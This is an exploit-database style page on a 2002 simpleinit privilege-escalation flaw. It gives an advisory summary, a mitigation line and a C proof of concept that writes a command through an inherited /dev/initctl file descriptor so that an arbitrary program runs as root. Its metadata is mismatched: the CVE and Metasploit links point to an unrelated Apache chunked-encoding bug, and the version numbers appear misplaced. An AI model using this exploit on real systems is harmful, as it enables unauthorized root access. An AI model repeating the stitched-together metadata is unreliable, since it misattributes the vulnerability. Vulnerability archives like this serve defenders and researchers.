Simpleinit Vulnerability

vendor:

Simpleinit

by:

SecurityFocus

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Simpleinit

Affected Version From: 1.3.2001

Affected Version To: 1.3.2002

Patch Exists: YES

Related CWE: CVE-2002-0392

CPE: //a:simpleinit

Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/, https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/, https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2002

A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser. The vulnerability occurs because simpleinit may allow some child processes to inherit a file descriptor with read-write access. The file descriptor is used to access /dev/initctl and this descriptor is normally used by 'initctl', 'need' and 'provide' programs to pass instructions to simpleinit. The simpleinit process runs with root privileges. A local user whose process inherits this file descriptor will be able to cause simpleinit to execute commands as the superuser.

Mitigation:

Users should upgrade to the latest version of simpleinit and ensure that all child processes are not allowed to inherit the file descriptor.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/5001/info

A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser.

The vulnerability occurs because simpleinit may allow some child processes to inherit a file descriptor with read-write access. The file descriptor is used to access /dev/initctl and this descriptor is normally used by 'initctl', 'need' and 'provide' programs to pass instructions to simpleinit. The simpleinit process runs with root privileges.

A local user whose process inherits this file descriptor will be able to cause simpleinit to execute commands as the superuser.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include "simpleinit.h"  /* From the util-linux source */

int main()
{
   int fd = 3;
   char buf[COMMAND_SIZE];
   struct command_struct* cmd = (struct command_struct*) buf;

   memset(buf, '\0', sizeof(buf));
   cmd->command = COMMAND_NEED;
   cmd->pid = 17;
   cmd->ppid = 16;
   strcpy(cmd->name, "/home/pat/x/foo");  /* foo will be run as root */
   write(fd, buf, COMMAND_SIZE);
   return 0;
}